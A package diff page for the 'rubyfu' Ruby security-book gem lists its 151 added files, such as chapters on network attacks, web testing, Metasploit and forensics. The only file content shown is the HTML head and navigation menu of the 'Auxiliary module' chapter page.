rubyfu 1.0.1

Files changed (151) hide show
  1. checksums.yaml +7 -0
  2. data/README.md +96 -0
  3. data/Rakefile +1 -0
  4. data/_book/beginners.html +1299 -0
  5. data/_book/contribution.html +1350 -0
  6. data/_book/contributors/Ruby_Loves_Us.jpg +0 -0
  7. data/_book/contributors/index.html +1294 -0
  8. data/_book/contributors/todo.html +1293 -0
  9. data/_book/cover.jpg +0 -0
  10. data/_book/faqs/index.html +1308 -0
  11. data/_book/files/module03/dns_spoofing_dns-query.pcap +0 -0
  12. data/_book/files/module03/dns_spoofing_dns-req_res.pcap.pcapng +0 -0
  13. data/_book/files/module06/ftp.pcap +0 -0
  14. data/_book/files/module06/packets.pcap +0 -0
  15. data/_book/gitbook/app.js +25001 -0
  16. data/_book/gitbook/fonts/fontawesome/FontAwesome.otf +0 -0
  17. data/_book/gitbook/fonts/fontawesome/fontawesome-webfont.eot +0 -0
  18. data/_book/gitbook/fonts/fontawesome/fontawesome-webfont.svg +504 -0
  19. data/_book/gitbook/fonts/fontawesome/fontawesome-webfont.ttf +0 -0
  20. data/_book/gitbook/fonts/fontawesome/fontawesome-webfont.woff +0 -0
  21. data/_book/gitbook/images/apple-touch-icon-precomposed-152.png +0 -0
  22. data/_book/gitbook/images/favicon.ico +0 -0
  23. data/_book/gitbook/plugins/gitbook-plugin-addcssjs/README.md +19 -0
  24. data/_book/gitbook/plugins/gitbook-plugin-addcssjs/index.js +57 -0
  25. data/_book/gitbook/plugins/gitbook-plugin-addcssjs/package.json +47 -0
  26. data/_book/gitbook/plugins/gitbook-plugin-anchors/plugin.css +26 -0
  27. data/_book/gitbook/plugins/gitbook-plugin-book-summary-scroll-position-saver/book-summary-scroll-position-saver.js +30 -0
  28. data/_book/gitbook/plugins/gitbook-plugin-expandable-chapters/expandable-chapters.css +28 -0
  29. data/_book/gitbook/plugins/gitbook-plugin-expandable-chapters/expandable-chapters.js +68 -0
  30. data/_book/gitbook/plugins/gitbook-plugin-fontsettings/buttons.js +151 -0
  31. data/_book/gitbook/plugins/gitbook-plugin-fontsettings/website.css +291 -0
  32. data/_book/gitbook/plugins/gitbook-plugin-highlight/ebook.css +131 -0
  33. data/_book/gitbook/plugins/gitbook-plugin-highlight/website.css +426 -0
  34. data/_book/gitbook/plugins/gitbook-plugin-search/lunr.min.js +7 -0
  35. data/_book/gitbook/plugins/gitbook-plugin-search/search.css +27 -0
  36. data/_book/gitbook/plugins/gitbook-plugin-search/search.js +135 -0
  37. data/_book/gitbook/plugins/gitbook-plugin-sharing/buttons.js +93 -0
  38. data/_book/gitbook/plugins/gitbook-plugin-splitter/splitter.css +22 -0
  39. data/_book/gitbook/plugins/gitbook-plugin-splitter/splitter.js +122 -0
  40. data/_book/gitbook/style.css +9 -0
  41. data/_book/googlec55db2d603c3da8b.html +1 -0
  42. data/_book/images/module02/Cryptography__wiringdiagram.png +0 -0
  43. data/_book/images/module02/packaging__ocra1.png +0 -0
  44. data/_book/images/module03/dns_spoofing_wireshark1.png +0 -0
  45. data/_book/images/module03/dns_spoofing_wireshark2.png +0 -0
  46. data/_book/images/module04/webfu__post_form1.png +0 -0
  47. data/_book/images/module04/webfu__proxy2.png +0 -0
  48. data/_book/images/module04/webfu__twitterAPI1.png +0 -0
  49. data/_book/images/module04/webfu__xmlrpc1.png +0 -0
  50. data/_book/images/module05/msf_template1.png +0 -0
  51. data/_book/images/module06/win-foren__winreg1.png +0 -0
  52. data/_book/images/other/Ruby_Loves_Us.jpg +0 -0
  53. data/_book/images/other/cover.jpg +0 -0
  54. data/_book/images/other/cover_small.jpg +0 -0
  55. data/_book/images/other/logo.png +0 -0
  56. data/_book/images/other/rubyfu.png +0 -0
  57. data/_book/images/other/rubyfu1.png +0 -0
  58. data/_book/images/other/rubyfu3.png +0 -0
  59. data/_book/images/other/rubyfu4.png +0 -0
  60. data/_book/images/other/rubyfu_.png +0 -0
  61. data/_book/index.html +1284 -0
  62. data/_book/module_0x1__basic_ruby_kung_fu/array.html +1297 -0
  63. data/_book/module_0x1__basic_ruby_kung_fu/conversion.html +1386 -0
  64. data/_book/module_0x1__basic_ruby_kung_fu/extraction.html +1346 -0
  65. data/_book/module_0x1__basic_ruby_kung_fu/index.html +1367 -0
  66. data/_book/module_0x1__basic_ruby_kung_fu/string.html +1451 -0
  67. data/_book/module_0x2__system_kung_fu/command_execution.html +1348 -0
  68. data/_book/module_0x2__system_kung_fu/cryptography.html +1396 -0
  69. data/_book/module_0x2__system_kung_fu/email.html +1352 -0
  70. data/_book/module_0x2__system_kung_fu/file_manipulation.html +1371 -0
  71. data/_book/module_0x2__system_kung_fu/index.html +1557 -0
  72. data/_book/module_0x2__system_kung_fu/ncatrb.html +1424 -0
  73. data/_book/module_0x2__system_kung_fu/packaging.md +1 -0
  74. data/_book/module_0x2__system_kung_fu/packaging__ocra1.png +0 -0
  75. data/_book/module_0x2__system_kung_fu/parsing_html,_xml,_json.html +1395 -0
  76. data/_book/module_0x2__system_kung_fu/rce_as_a_service.html +1336 -0
  77. data/_book/module_0x2__system_kung_fu/smtp_enumeration.html +1308 -0
  78. data/_book/module_0x2__system_kung_fu/system_shell.html +1299 -0
  79. data/_book/module_0x2__system_kung_fu/virustotal.html +1318 -0
  80. data/_book/module_0x3__network_kung_fu/Remote_shell.md +19 -0
  81. data/_book/module_0x3__network_kung_fu/arp_spoofing.html +1420 -0
  82. data/_book/module_0x3__network_kung_fu/dns.html +1315 -0
  83. data/_book/module_0x3__network_kung_fu/dns_bruteforce.md +49 -0
  84. data/_book/module_0x3__network_kung_fu/dns_enumeration.html +1371 -0
  85. data/_book/module_0x3__network_kung_fu/dns_spoofing.html +1694 -0
  86. data/_book/module_0x3__network_kung_fu/dns_spoofing_wireshark2.png +0 -0
  87. data/_book/module_0x3__network_kung_fu/ftp.html +1287 -0
  88. data/_book/module_0x3__network_kung_fu/index.html +1392 -0
  89. data/_book/module_0x3__network_kung_fu/network_scanning.html +1339 -0
  90. data/_book/module_0x3__network_kung_fu/network_traffic_analysis.html +1356 -0
  91. data/_book/module_0x3__network_kung_fu/nmap.html +1355 -0
  92. data/_book/module_0x3__network_kung_fu/oracle_tns_enum1.png +0 -0
  93. data/_book/module_0x3__network_kung_fu/packet_manipulation.html +1386 -0
  94. data/_book/module_0x3__network_kung_fu/ruby_socket.html +1553 -0
  95. data/_book/module_0x3__network_kung_fu/snmp_enumeration.html +1314 -0
  96. data/_book/module_0x3__network_kung_fu/ssh.html +1461 -0
  97. data/_book/module_0x3__network_kung_fu/ssid_finder.html +1324 -0
  98. data/_book/module_0x3__network_kung_fu/tns_enumeration.html +1505 -0
  99. data/_book/module_0x4__web_kung_fu/browser_manipulation.html +1630 -0
  100. data/_book/module_0x4__web_kung_fu/databases.html +1531 -0
  101. data/_book/module_0x4__web_kung_fu/extending_burpsuite.html +1303 -0
  102. data/_book/module_0x4__web_kung_fu/index.html +1536 -0
  103. data/_book/module_0x4__web_kung_fu/interacting_with_apis.html +1271 -0
  104. data/_book/module_0x4__web_kung_fu/ruby2javascript.html +1303 -0
  105. data/_book/module_0x4__web_kung_fu/sql_injection_scanner.html +1489 -0
  106. data/_book/module_0x4__web_kung_fu/twitter_api.html +1328 -0
  107. data/_book/module_0x4__web_kung_fu/web_servcies_and_apis.html +1291 -0
  108. data/_book/module_0x4__web_kung_fu/web_server_and_proxy.html +1370 -0
  109. data/_book/module_0x4__web_kung_fu/web_services.html +1394 -0
  110. data/_book/module_0x4__web_kung_fu/webfu__burp-ext1.png +0 -0
  111. data/_book/module_0x4__web_kung_fu/webfu__burp-ext2.png +0 -0
  112. data/_book/module_0x4__web_kung_fu/webfu__burp_setenv1.png +0 -0
  113. data/_book/module_0x4__web_kung_fu/webfu__proxy2.png +0 -0
  114. data/_book/module_0x4__web_kung_fu/webfu__twitterAPI1.png +0 -0
  115. data/_book/module_0x4__web_kung_fu/webfu__xmlrpc1.png +0 -0
  116. data/_book/module_0x4__web_kung_fu/wordpress_api.html +1543 -0
  117. data/_book/module_0x5__exploitation_kung_fu/MSF-struct.png +0 -0
  118. data/_book/module_0x5__exploitation_kung_fu/auxiliary_module.html +1870 -0
  119. data/_book/module_0x5__exploitation_kung_fu/exploit_module.html +1523 -0
  120. data/_book/module_0x5__exploitation_kung_fu/extensions.html +1466 -0
  121. data/_book/module_0x5__exploitation_kung_fu/fuzzer.html +1325 -0
  122. data/_book/module_0x5__exploitation_kung_fu/index.html +1319 -0
  123. data/_book/module_0x5__exploitation_kung_fu/metasm.html +1322 -0
  124. data/_book/module_0x5__exploitation_kung_fu/metasploit.html +1441 -0
  125. data/_book/module_0x5__exploitation_kung_fu/meterpreter.html +1327 -0
  126. data/_book/module_0x5__exploitation_kung_fu/meterpreter_scripting.html +1318 -0
  127. data/_book/module_0x5__exploitation_kung_fu/msf_meter_railgun1.png +0 -0
  128. data/_book/module_0x5__exploitation_kung_fu/msf_template1.png +0 -0
  129. data/_book/module_0x5__exploitation_kung_fu/railgun_api_extension.html +1300 -0
  130. data/_book/module_0x6__forensic/android_forensic.html +1356 -0
  131. data/_book/module_0x6__forensic/index.html +1332 -0
  132. data/_book/module_0x6__forensic/parsing_log_files.html +1375 -0
  133. data/_book/module_0x6__forensic/win-foren__winreg1.png +0 -0
  134. data/_book/module_0x6__forensic/windows_forensic.html +1289 -0
  135. data/_book/package.json +5 -0
  136. data/_book/references/index.html +1338 -0
  137. data/_book/required_gems.html +1342 -0
  138. data/_book/rubyfu_.png +0 -0
  139. data/_book/search_index.json +1 -0
  140. data/_book/styles/ebook.css +1 -0
  141. data/_book/styles/epub.css +1 -0
  142. data/_book/styles/header.js +5 -0
  143. data/_book/styles/mobi.css +1 -0
  144. data/_book/styles/pdf.css +1 -0
  145. data/_book/styles/website.css +41 -0
  146. data/bin/rubyfu +48 -0
  147. data/lib/rubyfu.rb +36 -0
  148. data/lib/rubyfu/browse.rb +35 -0
  149. data/lib/rubyfu/version.rb +3 -0
  150. data/lib/rubyfu/webserver.rb +30 -0
  151. metadata +210 -0
@@ -0,0 +1,1870 @@
1
+ <!DOCTYPE HTML>
2
+ <html lang="en" >
3
+
4
+ <head>
5
+
6
+ <meta charset="UTF-8">
7
+ <meta http-equiv="X-UA-Compatible" content="IE=edge" />
8
+ <title>Auxiliary module | RubyFu</title>
9
+ <meta content="text/html; charset=utf-8" http-equiv="Content-Type">
10
+ <meta name="description" content="">
11
+ <meta name="generator" content="GitBook 2.6.2">
12
+
13
+
14
+ <meta name="HandheldFriendly" content="true"/>
15
+ <meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=no">
16
+ <meta name="apple-mobile-web-app-capable" content="yes">
17
+ <meta name="apple-mobile-web-app-status-bar-style" content="black">
18
+ <link rel="apple-touch-icon-precomposed" sizes="152x152" href="../gitbook/images/apple-touch-icon-precomposed-152.png">
19
+ <link rel="shortcut icon" href="../gitbook/images/favicon.ico" type="image/x-icon">
20
+
21
+ <link rel="stylesheet" href="../gitbook/style.css">
22
+
23
+
24
+ <link rel="stylesheet" href="../gitbook/plugins/gitbook-plugin-anchors/plugin.css">
25
+
26
+
27
+
28
+ <link rel="stylesheet" href="../gitbook/plugins/gitbook-plugin-splitter/splitter.css">
29
+
30
+
31
+
32
+ <link rel="stylesheet" href="../gitbook/plugins/gitbook-plugin-expandable-chapters/expandable-chapters.css">
33
+
34
+
35
+
36
+ <link rel="stylesheet" href="../gitbook/plugins/gitbook-plugin-highlight/website.css">
37
+
38
+
39
+
40
+ <link rel="stylesheet" href="../gitbook/plugins/gitbook-plugin-search/search.css">
41
+
42
+
43
+
44
+ <link rel="stylesheet" href="../gitbook/plugins/gitbook-plugin-fontsettings/website.css">
45
+
46
+
47
+
48
+ <link rel="stylesheet" href="../styles/website.css">
49
+
50
+
51
+
52
+
53
+
54
+ <link rel="next" href="../module_0x5__exploitation_kung_fu/exploit_module.html" />
55
+
56
+
57
+ <link rel="prev" href="../module_0x5__exploitation_kung_fu/metasploit.html" />
58
+
59
+
60
+ <script type="text/javascript" src="../styles/header.js"></script>
61
+ </head>
62
+ <body>
63
+
64
+
65
+ <div class="book"
66
+ data-level="5.2.1"
67
+ data-chapter-title="Auxiliary module"
68
+ data-filepath="module_0x5__exploitation_kung_fu/auxiliary_module.md"
69
+ data-basepath=".."
70
+ data-revision="Wed Jan 27 2016 09:00:51 GMT+0300 (AST)"
71
+ data-innerlanguage="">
72
+
73
+
74
+ <div class="book-summary">
75
+ <nav role="navigation">
76
+ <ul class="summary">
77
+
78
+
79
+
80
+
81
+
82
+
83
+
84
+
85
+
86
+ <li class="chapter " data-level="0" data-path="index.html">
87
+
88
+
89
+ <a href="../index.html">
90
+
91
+ <i class="fa fa-check"></i>
92
+
93
+ Module 0x0 | Introduction
94
+ </a>
95
+
96
+
97
+ <ul class="articles">
98
+
99
+
100
+ <li class="chapter " data-level="0.1" data-path="contribution.html">
101
+
102
+
103
+ <a href="../contribution.html">
104
+
105
+ <i class="fa fa-check"></i>
106
+
107
+ <b>0.1.</b>
108
+
109
+ Contribution
110
+ </a>
111
+
112
+
113
+ </li>
114
+
115
+ <li class="chapter " data-level="0.2" data-path="beginners.html">
116
+
117
+
118
+ <a href="../beginners.html">
119
+
120
+ <i class="fa fa-check"></i>
121
+
122
+ <b>0.2.</b>
123
+
124
+ Beginners
125
+ </a>
126
+
127
+
128
+ </li>
129
+
130
+ <li class="chapter " data-level="0.3" data-path="required_gems.html">
131
+
132
+
133
+ <a href="../required_gems.html">
134
+
135
+ <i class="fa fa-check"></i>
136
+
137
+ <b>0.3.</b>
138
+
139
+ Required Gems
140
+ </a>
141
+
142
+
143
+ </li>
144
+
145
+
146
+ </ul>
147
+
148
+ </li>
149
+
150
+ <li class="chapter " data-level="1" data-path="module_0x1__basic_ruby_kung_fu/index.html">
151
+
152
+
153
+ <a href="../module_0x1__basic_ruby_kung_fu/index.html">
154
+
155
+ <i class="fa fa-check"></i>
156
+
157
+ <b>1.</b>
158
+
159
+ Module 0x1 | Basic Ruby Kung Fu
160
+ </a>
161
+
162
+
163
+ <ul class="articles">
164
+
165
+
166
+ <li class="chapter " data-level="1.1" data-path="module_0x1__basic_ruby_kung_fu/string.html">
167
+
168
+
169
+ <a href="../module_0x1__basic_ruby_kung_fu/string.html">
170
+
171
+ <i class="fa fa-check"></i>
172
+
173
+ <b>1.1.</b>
174
+
175
+ String
176
+ </a>
177
+
178
+
179
+ <ul class="articles">
180
+
181
+
182
+ <li class="chapter " data-level="1.1.1" data-path="module_0x1__basic_ruby_kung_fu/conversion.html">
183
+
184
+
185
+ <a href="../module_0x1__basic_ruby_kung_fu/conversion.html">
186
+
187
+ <i class="fa fa-check"></i>
188
+
189
+ <b>1.1.1.</b>
190
+
191
+ Conversion
192
+ </a>
193
+
194
+
195
+ </li>
196
+
197
+ <li class="chapter " data-level="1.1.2" data-path="module_0x1__basic_ruby_kung_fu/extraction.html">
198
+
199
+
200
+ <a href="../module_0x1__basic_ruby_kung_fu/extraction.html">
201
+
202
+ <i class="fa fa-check"></i>
203
+
204
+ <b>1.1.2.</b>
205
+
206
+ Extraction
207
+ </a>
208
+
209
+
210
+ </li>
211
+
212
+
213
+ </ul>
214
+
215
+ </li>
216
+
217
+ <li class="chapter " data-level="1.2" data-path="module_0x1__basic_ruby_kung_fu/array.html">
218
+
219
+
220
+ <a href="../module_0x1__basic_ruby_kung_fu/array.html">
221
+
222
+ <i class="fa fa-check"></i>
223
+
224
+ <b>1.2.</b>
225
+
226
+ Array
227
+ </a>
228
+
229
+
230
+ </li>
231
+
232
+
233
+ </ul>
234
+
235
+ </li>
236
+
237
+ <li class="chapter " data-level="2" data-path="module_0x2__system_kung_fu/index.html">
238
+
239
+
240
+ <a href="../module_0x2__system_kung_fu/index.html">
241
+
242
+ <i class="fa fa-check"></i>
243
+
244
+ <b>2.</b>
245
+
246
+ Module 0x2 | System Kung Fu
247
+ </a>
248
+
249
+
250
+ <ul class="articles">
251
+
252
+
253
+ <li class="chapter " data-level="2.1" data-path="module_0x2__system_kung_fu/command_execution.html">
254
+
255
+
256
+ <a href="../module_0x2__system_kung_fu/command_execution.html">
257
+
258
+ <i class="fa fa-check"></i>
259
+
260
+ <b>2.1.</b>
261
+
262
+ Command Execution
263
+ </a>
264
+
265
+
266
+ </li>
267
+
268
+ <li class="chapter " data-level="2.2" data-path="module_0x2__system_kung_fu/file_manipulation.html">
269
+
270
+
271
+ <a href="../module_0x2__system_kung_fu/file_manipulation.html">
272
+
273
+ <i class="fa fa-check"></i>
274
+
275
+ <b>2.2.</b>
276
+
277
+ File manipulation
278
+ </a>
279
+
280
+
281
+ <ul class="articles">
282
+
283
+
284
+ <li class="chapter " data-level="2.2.1" data-path="module_0x2__system_kung_fu/parsing_html,_xml,_json.html">
285
+
286
+
287
+ <a href="../module_0x2__system_kung_fu/parsing_html,_xml,_json.html">
288
+
289
+ <i class="fa fa-check"></i>
290
+
291
+ <b>2.2.1.</b>
292
+
293
+ Parsing HTML, XML, JSON
294
+ </a>
295
+
296
+
297
+ </li>
298
+
299
+
300
+ </ul>
301
+
302
+ </li>
303
+
304
+ <li class="chapter " data-level="2.3" data-path="module_0x2__system_kung_fu/cryptography.html">
305
+
306
+
307
+ <a href="../module_0x2__system_kung_fu/cryptography.html">
308
+
309
+ <i class="fa fa-check"></i>
310
+
311
+ <b>2.3.</b>
312
+
313
+ Cryptography
314
+ </a>
315
+
316
+
317
+ </li>
318
+
319
+ <li class="chapter " data-level="2.4" data-path="module_0x2__system_kung_fu/system_shell.html">
320
+
321
+
322
+ <a href="../module_0x2__system_kung_fu/system_shell.html">
323
+
324
+ <i class="fa fa-check"></i>
325
+
326
+ <b>2.4.</b>
327
+
328
+ Remote Shell
329
+ </a>
330
+
331
+
332
+ <ul class="articles">
333
+
334
+
335
+ <li class="chapter " data-level="2.4.1" data-path="module_0x2__system_kung_fu/ncatrb.html">
336
+
337
+
338
+ <a href="../module_0x2__system_kung_fu/ncatrb.html">
339
+
340
+ <i class="fa fa-check"></i>
341
+
342
+ <b>2.4.1.</b>
343
+
344
+ Ncat.rb
345
+ </a>
346
+
347
+
348
+ </li>
349
+
350
+ <li class="chapter " data-level="2.4.2" data-path="module_0x2__system_kung_fu/rce_as_a_service.html">
351
+
352
+
353
+ <a href="../module_0x2__system_kung_fu/rce_as_a_service.html">
354
+
355
+ <i class="fa fa-check"></i>
356
+
357
+ <b>2.4.2.</b>
358
+
359
+ RCE as a Service
360
+ </a>
361
+
362
+
363
+ </li>
364
+
365
+
366
+ </ul>
367
+
368
+ </li>
369
+
370
+ <li class="chapter " data-level="2.5" data-path="module_0x2__system_kung_fu/virustotal.html">
371
+
372
+
373
+ <a href="../module_0x2__system_kung_fu/virustotal.html">
374
+
375
+ <i class="fa fa-check"></i>
376
+
377
+ <b>2.5.</b>
378
+
379
+ VirusTotal
380
+ </a>
381
+
382
+
383
+ </li>
384
+
385
+
386
+ </ul>
387
+
388
+ </li>
389
+
390
+ <li class="chapter " data-level="3" data-path="module_0x3__network_kung_fu/index.html">
391
+
392
+
393
+ <a href="../module_0x3__network_kung_fu/index.html">
394
+
395
+ <i class="fa fa-check"></i>
396
+
397
+ <b>3.</b>
398
+
399
+ Module 0x3 | Network Kung Fu
400
+ </a>
401
+
402
+
403
+ <ul class="articles">
404
+
405
+
406
+ <li class="chapter " data-level="3.1" data-path="module_0x3__network_kung_fu/ruby_socket.html">
407
+
408
+
409
+ <a href="../module_0x3__network_kung_fu/ruby_socket.html">
410
+
411
+ <i class="fa fa-check"></i>
412
+
413
+ <b>3.1.</b>
414
+
415
+ Ruby Socket
416
+ </a>
417
+
418
+
419
+ </li>
420
+
421
+ <li class="chapter " data-level="3.2" data-path="module_0x3__network_kung_fu/ssid_finder.html">
422
+
423
+
424
+ <a href="../module_0x3__network_kung_fu/ssid_finder.html">
425
+
426
+ <i class="fa fa-check"></i>
427
+
428
+ <b>3.2.</b>
429
+
430
+ SSID Finder
431
+ </a>
432
+
433
+
434
+ </li>
435
+
436
+ <li class="chapter " data-level="3.3" data-path="module_0x3__network_kung_fu/ftp.html">
437
+
438
+
439
+ <a href="../module_0x3__network_kung_fu/ftp.html">
440
+
441
+ <i class="fa fa-check"></i>
442
+
443
+ <b>3.3.</b>
444
+
445
+ FTP
446
+ </a>
447
+
448
+
449
+ </li>
450
+
451
+ <li class="chapter " data-level="3.4" data-path="module_0x3__network_kung_fu/ssh.html">
452
+
453
+
454
+ <a href="../module_0x3__network_kung_fu/ssh.html">
455
+
456
+ <i class="fa fa-check"></i>
457
+
458
+ <b>3.4.</b>
459
+
460
+ SSH
461
+ </a>
462
+
463
+
464
+ </li>
465
+
466
+ <li class="chapter " data-level="3.5" data-path="module_0x2__system_kung_fu/email.html">
467
+
468
+
469
+ <a href="../module_0x2__system_kung_fu/email.html">
470
+
471
+ <i class="fa fa-check"></i>
472
+
473
+ <b>3.5.</b>
474
+
475
+ Email
476
+ </a>
477
+
478
+
479
+ <ul class="articles">
480
+
481
+
482
+ <li class="chapter " data-level="3.5.1" data-path="module_0x2__system_kung_fu/smtp_enumeration.html">
483
+
484
+
485
+ <a href="../module_0x2__system_kung_fu/smtp_enumeration.html">
486
+
487
+ <i class="fa fa-check"></i>
488
+
489
+ <b>3.5.1.</b>
490
+
491
+ SMTP Enumeration
492
+ </a>
493
+
494
+
495
+ </li>
496
+
497
+
498
+ </ul>
499
+
500
+ </li>
501
+
502
+ <li class="chapter " data-level="3.6" data-path="module_0x3__network_kung_fu/network_scanning.html">
503
+
504
+
505
+ <a href="../module_0x3__network_kung_fu/network_scanning.html">
506
+
507
+ <i class="fa fa-check"></i>
508
+
509
+ <b>3.6.</b>
510
+
511
+ Network Scanning
512
+ </a>
513
+
514
+
515
+ <ul class="articles">
516
+
517
+
518
+ <li class="chapter " data-level="3.6.1" data-path="module_0x3__network_kung_fu/nmap.html">
519
+
520
+
521
+ <a href="../module_0x3__network_kung_fu/nmap.html">
522
+
523
+ <i class="fa fa-check"></i>
524
+
525
+ <b>3.6.1.</b>
526
+
527
+ Nmap
528
+ </a>
529
+
530
+
531
+ </li>
532
+
533
+
534
+ </ul>
535
+
536
+ </li>
537
+
538
+ <li class="chapter " data-level="3.7" data-path="module_0x3__network_kung_fu/dns.html">
539
+
540
+
541
+ <a href="../module_0x3__network_kung_fu/dns.html">
542
+
543
+ <i class="fa fa-check"></i>
544
+
545
+ <b>3.7.</b>
546
+
547
+ DNS
548
+ </a>
549
+
550
+
551
+ <ul class="articles">
552
+
553
+
554
+ <li class="chapter " data-level="3.7.1" data-path="module_0x3__network_kung_fu/dns_enumeration.html">
555
+
556
+
557
+ <a href="../module_0x3__network_kung_fu/dns_enumeration.html">
558
+
559
+ <i class="fa fa-check"></i>
560
+
561
+ <b>3.7.1.</b>
562
+
563
+ DNS Enumeration
564
+ </a>
565
+
566
+
567
+ </li>
568
+
569
+
570
+ </ul>
571
+
572
+ </li>
573
+
574
+ <li class="chapter " data-level="3.8" data-path="module_0x3__network_kung_fu/snmp_enumeration.html">
575
+
576
+
577
+ <a href="../module_0x3__network_kung_fu/snmp_enumeration.html">
578
+
579
+ <i class="fa fa-check"></i>
580
+
581
+ <b>3.8.</b>
582
+
583
+ SNMP Enumeration
584
+ </a>
585
+
586
+
587
+ </li>
588
+
589
+ <li class="chapter " data-level="3.9" data-path="module_0x3__network_kung_fu/tns_enumeration.html">
590
+
591
+
592
+ <a href="../module_0x3__network_kung_fu/tns_enumeration.html">
593
+
594
+ <i class="fa fa-check"></i>
595
+
596
+ <b>3.9.</b>
597
+
598
+ Oracle TNS Enumeration
599
+ </a>
600
+
601
+
602
+ </li>
603
+
604
+ <li class="chapter " data-level="3.10" data-path="module_0x3__network_kung_fu/packet_manipulation.html">
605
+
606
+
607
+ <a href="../module_0x3__network_kung_fu/packet_manipulation.html">
608
+
609
+ <i class="fa fa-check"></i>
610
+
611
+ <b>3.10.</b>
612
+
613
+ Packet manipulation
614
+ </a>
615
+
616
+
617
+ <ul class="articles">
618
+
619
+
620
+ <li class="chapter " data-level="3.10.1" data-path="module_0x3__network_kung_fu/arp_spoofing.html">
621
+
622
+
623
+ <a href="../module_0x3__network_kung_fu/arp_spoofing.html">
624
+
625
+ <i class="fa fa-check"></i>
626
+
627
+ <b>3.10.1.</b>
628
+
629
+ ARP Spoofing
630
+ </a>
631
+
632
+
633
+ </li>
634
+
635
+ <li class="chapter " data-level="3.10.2" data-path="module_0x3__network_kung_fu/dns_spoofing.html">
636
+
637
+
638
+ <a href="../module_0x3__network_kung_fu/dns_spoofing.html">
639
+
640
+ <i class="fa fa-check"></i>
641
+
642
+ <b>3.10.2.</b>
643
+
644
+ DNS Spoofing
645
+ </a>
646
+
647
+
648
+ </li>
649
+
650
+
651
+ </ul>
652
+
653
+ </li>
654
+
655
+
656
+ </ul>
657
+
658
+ </li>
659
+
660
+ <li class="chapter " data-level="4" data-path="module_0x4__web_kung_fu/index.html">
661
+
662
+
663
+ <a href="../module_0x4__web_kung_fu/index.html">
664
+
665
+ <i class="fa fa-check"></i>
666
+
667
+ <b>4.</b>
668
+
669
+ Module 0x4 | Web Kung Fu
670
+ </a>
671
+
672
+
673
+ <ul class="articles">
674
+
675
+
676
+ <li class="chapter " data-level="4.1" data-path="module_0x4__web_kung_fu/sql_injection_scanner.html">
677
+
678
+
679
+ <a href="../module_0x4__web_kung_fu/sql_injection_scanner.html">
680
+
681
+ <i class="fa fa-check"></i>
682
+
683
+ <b>4.1.</b>
684
+
685
+ SQL Injection Scanner
686
+ </a>
687
+
688
+
689
+ </li>
690
+
691
+ <li class="chapter " data-level="4.2" data-path="module_0x4__web_kung_fu/databases.html">
692
+
693
+
694
+ <a href="../module_0x4__web_kung_fu/databases.html">
695
+
696
+ <i class="fa fa-check"></i>
697
+
698
+ <b>4.2.</b>
699
+
700
+ Databases
701
+ </a>
702
+
703
+
704
+ </li>
705
+
706
+ <li class="chapter " data-level="4.3" data-path="module_0x4__web_kung_fu/extending_burpsuite.html">
707
+
708
+
709
+ <a href="../module_0x4__web_kung_fu/extending_burpsuite.html">
710
+
711
+ <i class="fa fa-check"></i>
712
+
713
+ <b>4.3.</b>
714
+
715
+ Extending Burp Suite
716
+ </a>
717
+
718
+
719
+ </li>
720
+
721
+ <li class="chapter " data-level="4.4" data-path="module_0x4__web_kung_fu/browser_manipulation.html">
722
+
723
+
724
+ <a href="../module_0x4__web_kung_fu/browser_manipulation.html">
725
+
726
+ <i class="fa fa-check"></i>
727
+
728
+ <b>4.4.</b>
729
+
730
+ Browser Manipulation
731
+ </a>
732
+
733
+
734
+ </li>
735
+
736
+ <li class="chapter " data-level="4.5" data-path="module_0x4__web_kung_fu/web_servcies_and_apis.html">
737
+
738
+
739
+ <a href="../module_0x4__web_kung_fu/web_servcies_and_apis.html">
740
+
741
+ <i class="fa fa-check"></i>
742
+
743
+ <b>4.5.</b>
744
+
745
+ Web Services and APIs
746
+ </a>
747
+
748
+
749
+ <ul class="articles">
750
+
751
+
752
+ <li class="chapter " data-level="4.5.1" data-path="module_0x4__web_kung_fu/web_services.html">
753
+
754
+
755
+ <a href="../module_0x4__web_kung_fu/web_services.html">
756
+
757
+ <i class="fa fa-check"></i>
758
+
759
+ <b>4.5.1.</b>
760
+
761
+ Interacting with Web Services
762
+ </a>
763
+
764
+
765
+ </li>
766
+
767
+ <li class="chapter " data-level="4.5.2" data-path="module_0x4__web_kung_fu/interacting_with_apis.html">
768
+
769
+
770
+ <a href="../module_0x4__web_kung_fu/interacting_with_apis.html">
771
+
772
+ <i class="fa fa-check"></i>
773
+
774
+ <b>4.5.2.</b>
775
+
776
+ Interacting with APIs
777
+ </a>
778
+
779
+
780
+ <ul class="articles">
781
+
782
+
783
+ <li class="chapter " data-level="4.5.2.1" data-path="module_0x4__web_kung_fu/wordpress_api.html">
784
+
785
+
786
+ <a href="../module_0x4__web_kung_fu/wordpress_api.html">
787
+
788
+ <i class="fa fa-check"></i>
789
+
790
+ <b>4.5.2.1.</b>
791
+
792
+ WordPress API
793
+ </a>
794
+
795
+
796
+ </li>
797
+
798
+ <li class="chapter " data-level="4.5.2.2" data-path="module_0x4__web_kung_fu/twitter_api.html">
799
+
800
+
801
+ <a href="../module_0x4__web_kung_fu/twitter_api.html">
802
+
803
+ <i class="fa fa-check"></i>
804
+
805
+ <b>4.5.2.2.</b>
806
+
807
+ Twitter API
808
+ </a>
809
+
810
+
811
+ </li>
812
+
813
+
814
+ </ul>
815
+
816
+ </li>
817
+
818
+
819
+ </ul>
820
+
821
+ </li>
822
+
823
+ <li class="chapter " data-level="4.6" data-path="module_0x4__web_kung_fu/ruby2javascript.html">
824
+
825
+
826
+ <a href="../module_0x4__web_kung_fu/ruby2javascript.html">
827
+
828
+ <i class="fa fa-check"></i>
829
+
830
+ <b>4.6.</b>
831
+
832
+ Ruby 2 JavaScript
833
+ </a>
834
+
835
+
836
+ </li>
837
+
838
+ <li class="chapter " data-level="4.7" data-path="module_0x4__web_kung_fu/web_server_and_proxy.html">
839
+
840
+
841
+ <a href="../module_0x4__web_kung_fu/web_server_and_proxy.html">
842
+
843
+ <i class="fa fa-check"></i>
844
+
845
+ <b>4.7.</b>
846
+
847
+ Web Server and Proxy
848
+ </a>
849
+
850
+
851
+ </li>
852
+
853
+
854
+ </ul>
855
+
856
+ </li>
857
+
858
+ <li class="chapter " data-level="5" data-path="module_0x5__exploitation_kung_fu/index.html">
859
+
860
+
861
+ <a href="../module_0x5__exploitation_kung_fu/index.html">
862
+
863
+ <i class="fa fa-check"></i>
864
+
865
+ <b>5.</b>
866
+
867
+ Module 0x5 | Exploitation Kung Fu
868
+ </a>
869
+
870
+
871
+ <ul class="articles">
872
+
873
+
874
